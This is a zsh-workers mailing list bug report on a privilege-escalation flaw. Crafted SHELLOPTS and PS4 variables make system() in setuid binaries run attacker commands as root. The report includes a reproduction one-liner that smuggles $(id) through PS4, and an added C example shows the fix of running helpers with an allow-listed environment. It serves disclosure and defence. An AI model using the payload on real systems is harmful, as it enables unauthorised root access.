List-Id: Zsh Workers List
X-Seq: 39456
From: Mateusz Lenik
Date: Tue, 27 Sep 2016 06:59:18 +0000
Subject: BUG: crafting SHELLOPTS and PS4 allows running arbitrary programs in setuid binaries using system
To: zsh-workers@zsh.org

Hello everyone!

I just learned that bash fixed a vulnerability that also affects zsh. It allowed running arbitrary programs by crafting the SHELLOPTS and PS4 variables against setuid binaries using system/popen.

Steps to reproduce:

% gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
% sudo chown root:root test
% sudo chmod 4755 test
% env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root) gid=... groups=.../bin/date
Tue Sep 27 08:49:16 CEST 2016
% zsh --version
zsh 5.2 (x86_64-pc-linux-gnu)
%

The solution that bash folks implemented is to drop PS4 from the environment when the shell is run as root.

Best,
mlen
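The report above demonstrates the attack, and the fix it mentions lives in the shell. As an added example (not part of the original message, and not code from zsh or bash), the C program below shows the complementary mitigation on the setuid-binary side, which holds regardless of which shell /bin/sh resolves to: system() and popen() hand the caller's entire environment to "/bin/sh -c", so the program instead builds a minimal environment from an allow-list and runs the helper with fork/execve. The names build_clean_env, run_with_clean_env, env_lookup, ALLOWED and SAFE_PATH are this example's own, and the allow-list and PATH value are assumptions to be tailored per program.

```c
/* Added example, not from the original report or from zsh/bash: a setuid
 * program that runs a helper without system()/popen(), so no attacker-
 * controlled SHELLOPTS/PS4 (or any other environment variable) reaches a
 * shell.  build_clean_env() keeps only an allow-list of inherited variables
 * and sets a fixed PATH; run_with_clean_env() executes the helper with
 * fork/execve and that environment.  ALLOWED and SAFE_PATH are assumptions
 * chosen for illustration; tailor them to the program. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

extern char **environ;

/* Inherited variables that may pass through. SHELLOPTS, PS4, BASH_ENV, ENV,
 * IFS, LD_* and everything else are dropped simply by not being listed. */
static const char *const ALLOWED[] = { "TZ", "LANG", "LC_ALL", NULL };
#define SAFE_PATH "PATH=/usr/bin:/bin"   /* always set, never inherited */

/* Return the "NAME=value" entry for NAME in envp, or NULL if absent. */
const char *env_lookup(char *const *envp, const char *name) {
    size_t n = strlen(name);
    for (; *envp; envp++)
        if (strncmp(*envp, name, n) == 0 && (*envp)[n] == '=')
            return *envp;
    return NULL;
}

static char *dup_str(const char *s) {
    size_t n = strlen(s) + 1;
    char *d = malloc(n);
    return d ? memcpy(d, s, n) : NULL;
}

void free_env(char **env) {
    if (!env) return;
    for (char **p = env; *p; p++) free(*p);
    free(env);
}

/* Build a fresh NULL-terminated environment: SAFE_PATH first, then each
 * ALLOWED variable that exists in `inherited`. Free with free_env(). */
char **build_clean_env(char *const *inherited) {
    size_t slots = sizeof ALLOWED / sizeof ALLOWED[0] + 1; /* names + PATH + NULL */
    char **out = calloc(slots, sizeof *out);              /* zeroed: terminator included */
    if (!out) return NULL;
    size_t k = 0;
    out[k++] = dup_str(SAFE_PATH);
    for (size_t i = 0; ALLOWED[i]; i++) {
        const char *kv = env_lookup(inherited, ALLOWED[i]);
        if (kv) out[k++] = dup_str(kv);
    }
    for (size_t i = 0; i < k; i++)          /* allocation failure: give up cleanly */
        if (!out[i]) {
            for (size_t j = 0; j < k; j++) free(out[j]);
            free(out);
            return NULL;
        }
    return out;
}

/* Run argv[0] (an absolute path) with a clean environment derived from
 * `inherited`; returns the child's exit status, or -1 on error/signal. */
int run_with_clean_env(char *const argv[], char *const *inherited) {
    char **env = build_clean_env(inherited);
    if (!env) return -1;
    pid_t pid = fork();
    if (pid < 0) { free_env(env); return -1; }
    if (pid == 0) {
        execve(argv[0], argv, env);   /* no shell, no PATH search */
        _exit(127);
    }
    free_env(env);
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Same task as the report's system("/bin/date"), minus /bin/sh. */
    char *const cmd[] = { "/bin/date", NULL };
    int rc = run_with_clean_env(cmd, environ);
    if (rc != 0) fprintf(stderr, "helper failed with status %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

Compile with cc -o clean_exec clean_exec.c and run it the way the report runs ./test, i.e. env -i SHELLOPTS=xtrace PS4='$(id)' ./clean_exec: no shell is involved and neither variable reaches the child, so only the date is printed. Merely calling unsetenv("SHELLOPTS") and unsetenv("PS4") before system() would block this particular trick but leave every other shell-influencing variable, such as BASH_ENV or ENV, in the inherited environment, which is why an allow-list built from scratch is the safer default for privileged code.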